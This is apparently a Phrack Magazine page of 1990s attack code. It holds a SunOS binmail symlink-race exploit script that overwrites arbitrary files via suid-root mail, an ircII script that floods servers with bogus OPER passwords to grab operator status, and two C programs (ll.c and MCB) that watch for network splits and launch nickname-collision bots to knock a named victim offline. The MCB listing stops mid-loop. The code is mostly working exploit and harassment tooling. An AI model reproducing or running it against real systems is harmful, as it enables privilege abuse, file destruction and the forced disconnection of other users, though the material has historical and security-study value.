------------------------------------------------------------------------------

#!/bin/sh
# tmpmail: overwrite files using binmail
#
# Usage: tmpmail to-file
#
# (c) [8lgm] 1994, tested under SunOS 4.1.2.
#
#
# Note: Script only works if mail is suid root.
#       Other vendors may use tmpnam("ma").
#
# This vulnerability can be exploited for sgid
# mail binmails, the only modification would
# be to predict the pid of the mail process
# created by sendmail.  This would be 4 forward
# of the current pid - assuming a 'quiet' system.
#
# Will create to-file, or truncate.

PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS

PROG="`basename $0`"

# Check args
if [ $# -ne 1 ]; then
        echo "Syntax: $PROG to-file"
        exit 1
fi

TO_FILE="$1"

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
        echo "Sorry, this only works on SunOS"
        exit 1
fi

# Create our racing program!

cat > mailrace.c << 'EOF'
#include <stdio.h>
#include <unistd.h>

char path[] = "/tmp/maaXXXX";

main(argc,argv)
int argc;
char **argv;
{
  int pid;
  char *trv;

  if (argc != 3) {
    fprintf(stderr, "Usage: %s pid tofile\n", argv[0]);
    exit(1);
  }

  pid = atoi(argv[1]);

/* Stolen from mktemp.c */
  for (trv = path; *trv; ++trv);          /* extra X's get set to 0's */
  while (*--trv == 'X') {
    *trv = (pid % 10) + '0';
    pid /= 10;
  }

  symlink("/tmp/ShortSong", path);
  while(symlink(argv[2], path));
  exit(0);
}
EOF
cc -o mailrace mailrace.c

# Check we now have mailrace
if [ ! -x "mailrace" ]; then
        echo "$PROG: couldnt compile mailrace.c - check it out"
        exit 1
fi

# create some input for binmail
echo localhost $USER > /tmp/BlueRoom.$$
./mailrace $$ $TO_FILE &
exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$

------------------------------------------------------------------------------
###############################################################################

#  #  ##   ### #  #  ##  ###          Attempts to hack  IRC  operator status by 
#  # #  # #    # #  #  # #  #         flooding the  server with bogus passwords 
#### #### #    ##   #  # #  #         of various lengths.  Works on all servers
#  # #  # #    # #  #  # ###          I've tested so far..
#  # #  #  ### #  #  ##  #  v1.3+path                             - Illegible 8

###############################################################################
set NOVICE off

# #
###  Bogus passwords.. don't change these.  Other passwords don't work. (?)
# #
@ HackOP.A = [EACAGCGPGGGICADNCAFLGJGMGMGFGHGJGCGMDIFN]
@ HackOP.B = [FOGPGOCAFOGNGPGEGFCACCCFCACFCACLHHHDCCCAGFGDGIGPCACKCKCKCAENGPGEGFCAGDGIGBGOGHGFCACCCLGPHDHHCCCAGGGPHCCAHFHDGFHCCACEEOCAGCHJCACEEODLHDGFHECAFDFEEBFEFFFDFPFFENEPEEEFCACACICLGPCFCDCJ]
@ HackOP.C = [FOGPGOCACDCNHDGFGOGEFPGNHDGHCADBCACKCAHLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICACEEOCACNDOCACKCEDACKCACEDBCNHN]
@ HackOP.D = [GNGPGEGFCAEKHFGHGHGMGFHCCACLHDHH]
@ HackOP.E = [GFGDGIGPCACKCKCKCAFJGPHFCAGBHCGFCAGOGPHHCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHC]
@ HackOP.F = [FOGPGOCAGNGPGEGFCACNCCCFCACFCACLHHHDCC]
@ HackOP.G = [FOGPGOCACDCNHCGBHHFPGJHCGDCADACACCCFCADDDBDCCACKCCCAHLGJGGCACIFLCEDDFNDNDNFLCEEOFNCJCAHLHEGJGNGFHCCADACAGFGDGIGPCACKCKCKCACEDDCAGJHDCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHCHNHN]
@ HackOP.H = [EACAFDFEEBFEFFFDFPFFENEPEEEFCADNCAFLCAFMCICLGPCFCDFMCJFN]
@ HackOP.I = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFACACKCCCAHLEACAGCGPGGGICADNCAFLCEDAFNDLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICAEIGPCAGIGPCAGIGPCBHN]
@ HackOP.J = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFHCACKCCCAHLGJGGCACIFLCEDAFNDNDNFLCEGCGPGGGIFNCJCAHLCEDDCNDLCPCPFOGOGPHEGJGDGFCACEDACAGEGPGJGOGHDKCACEDDCNHNHN]
@ HackOP.K = [FOGBGMGJGBHDCAGLGJGMGMCAGJGGCACIFLCEDAFNCJCAHLCPCPFOHDGJGHGOGPGGGGCAELGJGMGMCAGGHCGPGNCACEEOCAFMCICEDACNFMCJHNHLCPCPELEJEMEMHN]
@ HackOP.L = [FOGPGOCACDFOHCGBHHFPGJHCGDCADACACCCFCADEDADBCACFCACFCADKEOGPCKCCCAHLGJGGCACIFLCEDDFNCBDNFLCEGCGPGGGIFNCJCAHLGFGDGIGPCACKCKCKCACEHDHEHCGJHACIDKCACEDDCNCJHNHLEACAGCGPGGGICADNCAFLDNDAFNHNHN]
@ HackOP.M = [GFHGGBGMCACPCPFOGOGPHEGJGDGFCACEGCGPGGGICAFCHFGOGOGJGOGHCAEIGBGDGLEPFACACNCACEHEGJGNGFCICJ]
@ HackOP.N = [FOGBGMGJGBHDCAHDHBHFGJHECAHLCPCPFOHDGJGHGOGPGGGGCACPHDHBHFGJHECACEDACNHN]
@ HackOP.O = [FOGBGMGJGBHDCAGDGPGOGOGFGDHECAGJGGCACIFLCEDAFNCJCAHLHNHLHNDLGFGDGIGPCACKCKCKCAEDEPEOEOEFEDFECAEOGPHECAGFGOGPHFGHGICAHAGBHCGBGNGFHEGFHCHD]
@ HackOP.P = [FOHDGFHECAGFHIGFGDFPHAHCGPHEGFGDHEGJGPGOCAGPGGGG]
@ HackOP.Q = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEJHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD]
@ HackOP.R = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEKHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD]
@ HackOP.S = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAEACAGCGPGGGICADNCAFLCEGCGPGGGIFNCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD]
@ HackOP.Z = [FOGBGMGJGBHDCACNHBHFGPHEGF]

# #
###  Ignore failed hack attempts..
# #
on #^raw_irc "% 491 *No O-lines*" #

# #
###  Poke server (causes a "POKE : unknown command" reply)
# #
@ hackop.poke.junk = [FOGBGMGJGBHDCAHBHFGPHEGFCAHLCEGEGFGDGPGEGFCICEDCCNCJHN]
alias hackop.poke {
	quote POKE \\;$decode($hackop.poke.junk)
	wait
}

# #
###  Send bogus passwords..
# #
alias hackop.hack {
	foreach HackOP XX {
		if ([$(HackOP.$XX)]!=[]) {quote OPER $N $(HackOP.$XX)}
		wait
	}
}

# #
###  Attempt to hack ops..
# #
alias hackop {
	umode -sw
	echo [HackOP] Poking server.. (should reply with error message)
	hackop.poke
	echo [HackOP] Attempting to hack IrcOps..
	hackop.hack
}

# #
###  Help..
# #
alias hackhelp {
	echo
	echo [HackOP] You have loaded HackOP.irc v1.3+path from Illegible 8.
	echo [HackOP]
	echo [HackOP] This script attempts to hack IRC Operator status on
	echo [HackOP] your current server.  To use it just type /hackop.
	echo [HackOP]
	echo [HackOP] Aliases added:  /hackhelp /hackop /kpath
	echo [HackOP]
	echo [HackOP] Enjoy it.. /kill your friends. 8-)
	echo
}

# #
###  The following code is taken from the ircII 2.2.9 distribution...
# #

###############################################################################
#
# No Kill Path Script II
#
# converted to 2.2.1 by phone
# CONVERTED for ircII2.2
# Version for servers 2.7.1* by Nap@irc <pioch@poly.polytechnique.fr>
# Original script from YeggMan
# Simplification by Daemon
# This version works both with old and new 2.7.1e kill formats !

@ kpath.kpath = [<empty>]
alias kpath echo ### Last received KILL Path: $kpath.kpath

alias kpath.ridx @ function_return = RINDEX(! $0) + 1
alias kpath.is_serv @ function_return  = INDEX(. $MID($kpath.ridx($0) 512 $0))
alias kpath.opkill echo ### KILL for $0 $MID($kpath.ridx($1) 9 $1) $2-
alias kpath.svkill echo ### ServerKill for $0

on ^server_notice "% * Notice -- Received KILL*" {
        if ([$9] == [From])
	{
        ^assign kpath.kpath $12-
        if (kpath.is_serv($12) > -1)
		{ kpath.svkill $8 }
		{ kpath.opkill $8 $10 $13- }
	}
	{
        ^assign kpath.kpath $10-
        if (kpath.is_serv($10) > -1)
		{ kpath.svkill $8 }
		{ kpath.opkill $8 $10 $11- }
	}
}
###[End of stolen code]########################################################

# #
###  HackOP loaded message, misc stuff.
# #
alias umode mode $N $0-
echo [HackOP] HackOP.irc v1.3+path loaded.  Type /hackhelp for help

------------------------------------------------------------------------------

[Editor's Note:  This is used in conjunction with the next program]

/*=============================================================*\
 * ll.c - link looker                                          *
 * Copyright (C) 1994 by The Software System                   *
 * Written by George Shearer (george@sphinx.biosci.wayne.edu)  *
\*=============================================================*/

/* This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 */

#define BUFSIZE	400			/* IRC Server buffer */
#define SERVER	"irc.escape.com"	/* IRC Server        */
#define PORT	6667			/* IRC Port          */
#define DELAYS	30			/* Loop delay seconds*/
#define TIMEOUT	30			/* connection timeout*/

#define ESTABLISHED	1
#define INPROGRESS	2
#define SPLIT		1

unsigned short int session=0,link_count=0;
char in[BUFSIZE],out_buf[BUFSIZE],hostname[64];
char *ins=in;
char *dedprsn, *kradprsn;

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>

struct irc_server {
  char *name;
  char *link;
  unsigned short int status;
  struct irc_server *next;
} *sl1=(struct irc_server *)0,*sl2=(struct irc_server *)0;

void do_ping(char *,char *);
void do_001(char *,char *);
void do_error(char *,char *);
void do_364(char *,char *);
void do_365(char *,char *);

struct parsers {
   char *cmd;
   void (*func)(char *,char *);
} parsefuns[] = {
   { "PING", (void *)do_ping },
   { "001", (void *)do_001 },
   { "364",(void *)do_364 },
   { "365", (void *)do_365},
   { "ERROR",(void *)do_error},
   { (char *)0,(void *)0 }
};

struct sockaddr_in server;
int sock=0;

unsigned long int
resolver(char *host) {
  unsigned long int ip=0L;

  if(host && *host && (ip=inet_addr(host))==-1) {
    struct hostent *he;
    int x=0;

    while(!(he=gethostbyname((char *)host)) && x++<3) {
      printf("."); fflush(stdout);
      sleep(1);
    }
    ip=(x<3) ? *(unsigned long *)he->h_addr_list[0] : 0L;
  }

  return(ip);
}

void
clean_sl2(void) {
  while(sl2) {
    struct irc_server *temp=sl2->next;
    if(sl2->name)
      free(sl2->name);
    if(sl2->link)
      free(sl2->link);
    free(sl2);
    sl2=temp;
  }
  sl2=(struct irc_server *)0;
}

void
exit_program(char *why) {
  printf("\nExiting program. (%s)\n",why);

  if(sock)
    close(sock);

  while(sl1) {
    struct irc_server *temp=sl1->next;
    if(sl1->name)
      free(sl1->name);
    if(sl1->link)
      free(sl1->link);
    free(sl1);
    sl1=temp;
  }

  clean_sl2();

  if(in)
    free(in);

  exit(0);
}

int mystrccmp(register char *s1,register char *s2) {
   while((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)==
        (((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++))
     if(*s1++==0) return 0;
   return (*(unsigned char *)s1-*(unsigned char *)--s2);
}

char *mstrcpy(char **to,char *from) {
  if(from) {
    if((*to=(char *)malloc(strlen(from)+1)))
      strcpy(*to,from);
  }
  else
    *to=(char *)0;
  return(*to);
}

char *digtoken(char **string,char *match) {
  if(string && *string && **string) {
    while(**string && strchr(match,**string))
      (*string)++;
    if(**string) { /* got something */
      char *token=*string;
      if((*string=strpbrk(*string,match))) {
        *(*string)++=(char)0;
        while(**string && strchr(match,**string))
          (*string)++;
      }
      else
        *string = ""; /* must be at the end */
      return(token);
    }
  }
  return((char *)0);
}

void signal_handler(void) {
  exit_program("caught signal");
}

void signal_alarm(void) {
  exit_program("timed out waiting for server interaction.");
}

void
out(void) {
  int length=strlen(out_buf);
  errno=0;
  if(write(sock,out_buf,length)!=length)
    exit_program((char *)errno);
}

void
init_server(void) {
  int length;

  sprintf(out_buf,"USER kil kil kil :ded kilr huntin %s\nNICK kil%d\nPRIVMSG %s :ded kilr hunting %s\n",
    dedprsn, getpid(), kradprsn, dedprsn);
  length=strlen(out_buf);

  errno=0;

  if(write(sock,out_buf,length)==length) {
    puts("established");
    session=ESTABLISHED;
    alarm(TIMEOUT);
    sprintf(out_buf,"LINKS\n");
    out();
  }
  else
    exit_program((char *)errno);
}

void
heartbeat(void) {
  strcpy(out_buf,"LINKS\n");
  out();
  signal(SIGALRM,(void *)heartbeat);
  alarm(DELAYS);
}

void
do_364(char *from,char *left) {
  struct irc_server *serv;
  char *sv1,*sv2;
  char *nick;

  serv=(struct irc_server *)malloc(sizeof(struct irc_server));
  serv->next=sl2;

  serv->status=0;
  nick=digtoken(&left," ");
  sv1=digtoken(&left," ");
  sv2=digtoken(&left," ");

  mstrcpy(&serv->name,sv1);
  mstrcpy(&serv->link,sv2);
  sl2=serv;
}

int
findserv(struct irc_server *serv,char *name) {
  for(;serv;serv=serv->next)
    if(!mystrccmp(name,serv->name))
      return(1);
  return(0);
}

void
do_365(char *from,char *left) {
  struct irc_server *serv=sl1;
  char kilstring[150];

  for(;serv;serv=serv->next) {
    if(!findserv(sl2,serv->name)) {
      if(!(serv->status & SPLIT)) {
        printf("Split server  : %s [%s]\n",serv->name,serv->link);
        serv->status|=SPLIT;
      }
    }
    else
      if(serv->status & SPLIT) {
        printf("Merging server: %s [%s]\n",serv->name,serv->link);
        sprintf(kilstring, "mcb %s %s:%s %s&",
          kradprsn, dedprsn, serv->name, serv->link);
        system(kilstring);
        serv->status&=~SPLIT;
      }
  }

  serv=sl2;

  for(;serv;serv=serv->next) {
    if(!findserv(sl1,serv->name)) {
      struct irc_server *serv2;

      serv2=(struct irc_server *)malloc(sizeof(struct irc_server));
      serv2->next=sl1;
      serv2->status=0;
      mstrcpy(&serv2->name,serv->name);
      mstrcpy(&serv2->link,serv->link);
      sl1=serv2;
      if(link_count) {
        printf("Added server  : %s [%s]\n",serv->name,serv->link);
        sprintf(kilstring, "mcb %s %s:%s %s&",
          kradprsn, dedprsn, serv->name, serv->link);
        system(kilstring);
      }
    }
  }

  link_count=1;
  clean_sl2();
}

void
do_ping(char *from,char *left) {
  sprintf(out_buf,"PING :%s\n",hostname);
  out();
}

void
do_001(char *from,char *left) {
  printf("Logged into server %s as nickname kil%d\n",from,getpid());
  printf("Hunting %s\n\n", dedprsn);
  alarm(0);
  signal(SIGALRM,(void *)heartbeat);
  alarm(DELAYS);
}

void
do_error(char *from,char *left) {
  printf("Server error: %s\n",left);
}

void
parse2(void) {
  char *from,*cmd,*left;

  if(*ins==':') {
    if(!(cmd=strchr(ins,' ')))
      return;
    *cmd++=(char)0;
    from=ins+1;
  }
  else {
    cmd=ins;
    from=(char *)0;
  }
  if((left=strchr(cmd,' '))) {
    int command;
    *left++=(char)0;
    left=(*left==':') ? left+1 : left;
    for(command=0;parsefuns[command].cmd;command++) {
      if(!mystrccmp(parsefuns[command].cmd,cmd)) {
        parsefuns[command].func(from,left);
        break;
      }
    }
  }
}

void
parse(int length) {
  char *s=in;

  *(ins+length)=(char)0;

  for(;;) {
    ins=s;
    while(*s && *s!=(char)13 && *s!=(char)10)
      s++;
    if(*s) {
      while(*s && (*s==(char)13 || *s==(char)10))
        *s++=(char)0;
      parse2();
    }
    else
      break;
  }
  strcpy(in,ins);
  ins=in+(s-ins);
}

void
process_server(void) {
  int x=0;

  for(;;) {
    fd_set rd,wr;
    struct timeval timeout;

    timeout.tv_usec=0; timeout.tv_sec=1;
    FD_ZERO(&rd); FD_ZERO(&wr);

    FD_SET(sock,&rd);
    if(session==INPROGRESS)
      FD_SET(sock,&wr);

    errno=0;
    select(getdtablesize(),&rd,&wr,NULL,(session==INPROGRESS)
           ? (struct timeval *)&timeout : NULL);

    if(errno==EINTR)
      continue;

    errno=0;
    if(session==INPROGRESS) {
      if(FD_ISSET(sock,&wr)) {
        init_server();
         continue;
      }
      else {
        if(x++>=TIMEOUT)
          exit_program("connection timed out");
        printf("."); fflush(stdout);
      }
    }

    if(FD_ISSET(sock,&rd)) {
      int length=read(sock,ins,BUFSIZE-(ins-in));

      if(length<1) {
        if(session!=INPROGRESS)
          if(!errno) {
            puts("Connection closed by foreign host.");
            errno=ENOTCONN;
          }
          else
            printf("Connection to %s closed.\n",
                   inet_ntoa(server.sin_addr));
        exit_program((char *)errno);
      }
      if(strpbrk(in,"\x0a\x0d"))
        parse(length);
      else
        ins=(BUFSIZE-((ins+length)-in)<1)?in:ins+length;
    }
  }
}

void
main(int argc,char *argv[]) {
  char serverhost[80];
  unsigned short int sport=PORT;

  kradprsn = argv[1];
  dedprsn  = argv[2];

  if(argc<3)
    exit(1);

  if(argc==4) {
    char *port=strchr(argv[3],':');
    sport=(port)?atoi(port+1):sport;
    strcpy(serverhost,argv[3]);
    if(port)
      serverhost[port-argv[3]]=(char)0;
  }
  else
    strcpy(serverhost,SERVER);

  signal(SIGPIPE,(void *)signal_handler);
  signal(SIGHUP,(void *)signal_handler);
  signal(SIGINT,(void *)signal_handler);
  signal(SIGTERM,(void *)signal_handler);
  signal(SIGBUS,(void *)signal_handler);
  signal(SIGABRT,(void *)signal_handler);
  signal(SIGSEGV,(void *)signal_handler);
  signal(SIGALRM,(void *)signal_alarm);

  errno=0;
  if((sock=socket(AF_INET,SOCK_STREAM,0))>0) {
    server.sin_family=AF_INET;
    server.sin_port=htons(sport);
    printf("Resolving %s...",serverhost); fflush(stdout);
    if((server.sin_addr.s_addr=resolver(serverhost))) {
      puts("done");

      setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
      setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
      setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);

      fcntl(sock,F_SETFL,(fcntl(sock,F_GETFL)|O_NONBLOCK));

      printf("Connecting to %s...",inet_ntoa(server.sin_addr));
      fflush(stdout);

      errno=0;
      if(connect(sock,(struct sockaddr *)&server,sizeof(server))) {
        if(errno!=EINPROGRESS && errno!=EWOULDBLOCK)
          exit_program((char *)errno);
        else
          session=INPROGRESS;
      }
      else
        init_server();

      gethostname(hostname,64);
      process_server();
    }
    else
      exit_program("resolve failed");
  }
  else
    printf("Failed to allocate an AF_INET socket. (%s)\n",(char *)errno);
}

------------------------------------------------------------------------------

/*===============================*\
|*  MCB - Multi-CollideBot v1.5a *|
|*     Written by Dr. Delete     *|
|* Basically just a way to make  *|
|* several TCP connections to a  *|
|* server in one small process.  *|
\*===============================*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include <sys/file.h>
#include <arpa/inet.h>

#define BUFSIZE 350
#define MAXSESSIONS 256
#define BOTTIMEOUT 900 /* 15 minutes (900 seconds) bot lifetime */

struct sockaddr_in server;

char buf[BUFSIZE];
char *kradprsn;

struct ircsession {
   int sock;
   char stack[BUFSIZE*2];
   char *server;
   char *nick;
   int stat;
} session[MAXSESSIONS];

int sessions,total_sessions;

char *nickpick="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`_";
#define NICKLEN 54

void sig_pipe(void) {
   puts("Odd, I just caught a SIGPIPE.");
   signal(SIGPIPE,(void *)sig_pipe);
}

void fillran(char *s,int len) {
   while(len--)
     *s++=*((nickpick)+(rand()%NICKLEN));
   *s=0;
}

int strnccmp(register char *s1,register char *s2,register int n) {
   if(n==0) return(0);
   do {
     if((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)!=(((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++))
       return (*(unsigned char *)s1-*(unsigned char *)--s2);
     if(*s1++==0) break;
   } while(--n!=0);
   return(0);
}

char *mycstrstr(char *str1,char *str2) {
   int xstr1len,ystr2len;

   xstr1len=strlen(str1);
   ystr2len=strlen(str2);

   while(xstr1len && strnccmp(str1++,str2,ystr2len) && xstr1len-->=ystr2len);
   if(!xstr1len || xstr1len<ystr2len || !ystr2len) return(0);
   return(str1-1);
}

void out(int fd, char *s) {
  write(fd,s,strlen(s));
}

void cclosed(int sessionum) {
   if(session[sessionum].sock)
     shutdown(session[sessionum].sock,2);
   close(session[sessionum].sock);
   session[sessionum].sock=0;
   printf("%s: Connection to %s closed.\n",session[sessionum].nick,session[sessionum].server); fflush(stdout);
   if(!sessions || !total_sessions) {
     puts("CollideBot finished.");
     exit(0);
   }
}

void quitprog(void) {
   printf("Signal received! CollideBot exiting. %d sessions still active.\n",sessions); fflush(stdout);
   while(total_sessions--)
     if(session[total_sessions].sock) {
        out(session[total_sessions].sock,"QUIT :signal received\r\n");
        cclosed(total_sessions);
     }
   puts("CollideBot finished.");
   exit(0);
}

unsigned long int resolver(char *host) {
   int x=0;
   unsigned long int tempresl;
   struct hostent *he;

   if(sscanf(host,"%d.%d.%d.%d",&x,&x,&x,&x)==4 || !strcmp(host,"0"))
     return(inet_addr(host));
   while(!(he=gethostbyname((char *)host)) && x++<3)
     sleep(1);
   if(x<3)
     return(htonl((unsigned long int)((unsigned char)he->h_addr_list[0][0]*
            (unsigned int)256+(unsigned char)he->h_addr_list[0][1])*
            (unsigned int)65536+(unsigned long int)((unsigned char)
            he->h_addr_list[0][2]*(unsigned int)256+(unsigned char)
            he->h_addr_list[0][3])));
   printf("Unable to resolve %s!\n",host);
   return(0);
}

void estab2(int sock,char *ircservername,char *nick) {
  char tempnick[10];

  printf("%s: Connection to %s established.\n",nick,ircservername); fflush(stdout);
  fillran(tempnick,9);
  sprintf(buf,"USER %s %s %s %s\r\nNICK %s\r\nPRIVMSG %s :%s iz ded, woowoo\r\n",tempnick,tempnick,tempnick,tempnick,(!strnccmp(nick,kradprsn,5)) ? tempnick : nick, kradprsn, nick);
  fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) & ~O_NDELAY));
  out(sock,buf);
}

int estab(unsigned long int ircserver,char *ircservername,int x) {
  int sock;

  sock=socket(AF_INET,SOCK_STREAM,0);
  server.sin_family=AF_INET;
  server.sin_port=htons(6667);
  server.sin_addr.s_addr=ircserver;
  fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) | O_NDELAY));
  errno=0;
  if((session[x].nick[0]==68 || session[x].nick[0]==100) && (session[x].nick[1]==82 || session[x].nick[1]==114) &&
     (session[x].nick[2]==95) && (session[x].nick[3]==68 || session[x].nick[3]==100) &&
     (session[x].nick[4]==69 || session[x].nick[4]==101) && (session[x].nick[5]==76 || session[x].nick[5]==108) &&
     (session[x].nick[6]==69 || session[x].nick[6]==101) && (session[x].nick[7]==84 || session[x].nick[7]==116) &&
     (session[x].nick[8]==69 || session[x].nick[8]==101)) {
    printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout);
    close(sock);
    return(0);
  }
  if(connect(sock,(struct sockaddr *)&server,sizeof(server))<0) {
    if(errno!=EINPROGRESS) {
      printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout);
      close(sock);
      return(0);
    }
    else 
      session[x].stat=2;
  }
  else {
    estab2(sock,ircservername,session[x].nick);
    session[x].stat=0;
  }
  return(sock);
}

void parse2(char *buf,int len,int sessionum) {
  char *num;
  if((num=mycstrstr(buf," ")))
    if(atoi((num+1))==372)
      return;
  if(!strnccmp(buf,"PING",4)) {
    buf[1]='O';
    out(session[sessionum].sock,(char *)buf);
    out(session[sessionum].sock,"\r\n");
  }
  else if(mycstrstr(buf,"already in use")) {
    printf("%s: Nickname already in use.\n",session[sessionum].nick);
    out(session[sessionum].sock,"QUIT\r\n");
  }
  else if(mycstrstr(buf,"kill") && !session[sessionum].stat++)
    printf("%s: SCORE!\n",session[sessionum].nick);
  else if(mycstrstr(buf,"authoriz"))
    printf("%s: Not authorized to use server.\n",session[sessionum].nick);
  else if(mycstrstr(buf,"ghosts"))
    printf("%s: Banned from this IRC server.\n",session[sessionum].nick);
}

void parse(unsigned char *buf,int rl,int sessionum) {
  int x=0,len;

  strcat(session[sessionum].stack,buf);
  len=strlen(session[sessionum].stack);
  while(session[sessionum].stack[x]!=13 && session[sessionum].stack[x]!=10 && session[sessionum].stack[x])
    x++;
  if(session[sessionum].stack[x]) {
    session[sessionum].stack[x]=0;
    parse2(session[sessionum].stack,x+1,sessionum);
    if(len>=(x+1)) {
      strcpy(buf,(char *)&session[sessionum].stack[x+1]);
      session[sessionum].stack[0]=0;
      parse(buf,len-(x+1),sessionum);
    }
    else
      session[sessionum].stack[0]=0;
  }
}

void process_servers(int secs) {
    fd_set rd,wr;
    int x,length,selectr=1;
    struct timeval timeout;

    while(selectr>0) {

      timeout.tv_usec=0;
      timeout.tv_sec=secs;

      errno=0;
      FD_ZERO(&rd);
      FD_ZERO(&wr);
      for(x=0;x<total_sessions;x++)
        if(session[x].sock)
          if(session[x].stat!=2)
            FD_SET(session[x].sock,&rd);
          else
            FD_SET(session[x].sock,&wr);

      selectr=select(getdtablesize(),&rd,&wr,NULL,(secs<0) ? NULL : (struct timeval *)&timeout);
      if(errno==EINTR)
        continue;

      for(x=0;x<total_sessions;x++)
        if(FD_ISSET(session[x].sock,&wr)) {
          session[x].stat=0;
          estab2(session[x].sock,session[x].server,session[x].nick);
        }
        else if(session[x].stat!=2 && FD_ISSET(session[x].sock,&rd)) {
          if(!(length=read(session[x].sock,buf,BUFSIZE-1))) {
            sessions--;
            cclosed(x);
	    continue;
          }
          buf[length]=0;
          parse(buf,length,x);
        }
    }
}

void main(int argc,char *argv[]) {
  unsigned short int pid,x;
  unsigned long int ircserver=0;
  char *lastnick=0;

  if(argc<3)
    exit(0);

  kradprsn = argv[1];

  /* if((pid=fork())) {
    printf("Process ID %d.\n",pid);
    exit(0);
  } */
  
  sessions=total_sessions=0;

  srand(getpid());

  signal(SIGHUP,(void *)quitprog);
  signal(SIGTERM,(void *)quitprog);
  signal(SIGABRT,(void *)quitprog);
  signal(SIGINT,(void *)quitprog);
  signal(SIGPIPE,(void *)sig_pipe);

  for(x=1;x<argc-1 && x<MAXSESSIONS;x++) {
    char *tempp,*default_server;
    unsigned long int tempserver;
    session[x].nick=(argv[x+1][0]=='@') ? (char *)&argv[x+1][1] : argv[x+1];
    if((tempp=mycstrstr(argv[x+1],":"))) {
      *tempp=0;
      lastnick=session[x].nick;
      tempserver=ircserver;
      ircserver=resolver(tempp+1);
      if(ircserver)
        default_server=tempp+1;
      else
        ircserver=tempserver;
    }
    else if(mycstrstr(argv[x+1],".")) {
      if(!lastnick) {
        printf("Error: No default nickname to use for connection to %s!\n",argv[x+1]);
        continue;
      }
      tempserver=ircserver;
      ircserver=resolver(argv[x+1]);
      if(ircserver)
        default_server=argv[x+1];
      else
        ircserver=tempserver;
      session[x].nick=lastnick;
    }
    lastnick=session[x].nick;
    if(ircserver) {
      if((session[x].sock=estab(ircserver,default_server,x))) {
        session[x].stack[0]=0;
        session[x].server=default_server;
        sessions++;
      }
    }
    else
      printf("%s: Error! No default server set.\n",session[x].nick);
    total_sessions=x+1;
  }

  if(sessions<1) {
    printf("CollideBot Exiting, no established sessions.\n");
    exit(0);
  }

  signal(SIGALRM,(void *)quitprog);
  alarm(BOTTIMEOUT);

  while(1)
    

------------------------------------------------------------------------------

[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2014, Phrack Magazine.